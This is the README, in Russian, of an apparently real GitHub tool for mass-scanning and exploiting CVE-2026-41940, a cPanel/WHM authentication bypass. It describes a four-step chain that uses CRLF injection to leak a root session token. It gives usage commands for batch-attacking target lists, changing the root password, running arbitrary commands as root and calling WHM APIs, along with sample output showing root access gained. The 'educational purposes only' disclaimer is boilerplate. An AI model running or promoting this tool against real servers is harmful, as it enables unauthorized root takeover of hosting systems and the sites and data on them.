
cPanel/WHM CVE-2026-41940 — массовый сканер и эксплоитер
Сканер и эксплойт для обхода аутентификации cPanel/WHM для CVE-2026-41940
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Используя этот инструмент, вы соглашаетесь с тем, что:
❗ Автор НЕ несет ответственности за любое неправомерное использование, незаконные действия, ущерб или юридические последствия, возникшие в результате использования этого инструмента.
CVE-2026-41940 — это критическая уязвимость обхода аутентификации в cPanel/WHM, которая может позволить злоумышленникам получить несанкционированный доступ уровня root без действительных учетных данных.
Этот инструмент предоставляет реализацию на Python для:
| Этап | Описание |
|---|---|
| 1. Предаутентификация | Отправить недействительные учетные данные на /login/ для получения cookie whostmgrsession |
| 2. CRLF-инъекция | Внедрить перевод строки через заголовок Authorization: Basic для утечки токена cpsess |
| 3. Распространение токена | Запустить do_token_denied для распространения токена в кеш |
| 4. Проверка | Обратиться к /json-api/version для подтверждения доступа root в WHM |
| Функция | Описание |
|---|---|
| 🔄 Пакетное сканирование | Сканирование нескольких целей одновременно |
| 🎯 Одиночная цель | Сканирование отдельной цели с подробным выводом |
| 🔌 Сканирование портов | Автоматическое сканирование портов WHM (2082, 2083, 2086, 2087) |
| 🔓 URL сессии | Генерация URL для входа в WHM в один клик |
| 💀 RCE | Выполнение системных команд с правами root |
| 🔑 Смена пароля | Изменение пароля root в WHM |
| 📡 Вызовы API WHM | Вызов функций API WHM |
| 🎨 Цветной вывод | Визуальный вывод результатов |
| 💾 Экспорт результатов | Сохранение уязвимых целей в файл |
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Тест с одной целью
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Одиночная цель
python cpanel-mass-checker.py -u https://target.com:2087
# Пакетное сканирование
python cpanel-mass-checker.py -f targets.txt -c 20
# Пакетное сканирование со сканированием портов
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Генерация URL сессии
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Смена пароля root
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Выполнение команды (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# Вызов API WHM
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Строки, начинающиеся с #, являются комментариями
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
| Параметр | Описание | Пример |
|---|---|---|
| -u | URL отдельной цели | -u https://target.com:2087 |
| -f | Файл со списком целей | -f targets.txt |
| -c | Одновременность (потоки) | -c 20 |
| -o | Выходной файл | -o results.txt |
| -hostname | Пользовательский заголовок Host | -hostname cpanel.target.com |
| --scan-ports | Сканировать все порты WHM | --scan-ports |
| -session | Сгенерировать URL входа | -session |
| -passwd | Изменить пароль root | -passwd "NewPass123" |
| -cmd | Выполнить команду | -cmd "id" |
| -keep | Сохранить временную учетную запись | -keep |
| -api | Вызвать API WHM | -api listaccts |
| -api-params | Параметры API | -api-params "user=root,password=123" |
[*] Всего: 4 цели (после дедупликации), одновременность: 10
[*] Сканирование портов: ВКЛ (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [УЯЗВ] https://example.com:2087 - token=/cpsess1048057410
[1/4] [БЕЗОП] safe-target.com
------------------------------------------------------------
[*] Сканирование завершено. Уязвимых: 1
[+] Результаты сохранены в result.txt
[0] hostname = example.com
[1] создание сессии preauth...
[2] отправка CRLF-инъекции...
[3] запуск do_token_denied...
[4] проверка доступа root в WHM...
[+] Доступ root в WHM получен!
[+] URL сессии:
https://example.com:2087/cpsessXXXXXXX/
| Поле | Значение |
|---|---|
| CVE | CVE-2026-41940 |
| Серьезность | Критический (CVSS 9.8) |
| Вектор атаки | Сеть |
| Необходимые привилегии | Не требуются |
| Взаимодействие с пользователем | Не требуется |
-hostnameДля безопасного и законного тестирования:
Если этот проект помог вам, поставьте ⭐